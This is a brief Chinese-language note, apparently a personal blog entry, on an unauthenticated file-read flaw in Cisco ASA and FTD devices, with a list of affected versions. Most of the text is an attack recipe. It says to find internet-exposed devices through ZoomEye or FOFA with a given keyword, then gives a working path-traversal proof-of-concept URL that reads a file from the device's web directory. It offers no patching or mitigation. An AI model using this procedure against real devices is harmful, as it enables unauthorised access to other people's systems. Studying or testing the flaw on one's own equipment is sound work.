前端時間碰到了該漏洞,記錄一下!
該漏洞為思科ASA裝置和FTD裝置的未授權任意檔案讀取漏洞,但僅能讀取到<code>WEB</code>目錄下的檔案,影響版本如下:
Cisco ASA:<= 9.6
Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
首先利用<code>zoomeye</code>或者<code>fofa</code>搜尋裝置,搜尋關鍵詞為<code>/+CSCOE+/</code>,如下圖所示:
<code>POC</code>為<code>URL/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../</code>,如下圖所示:
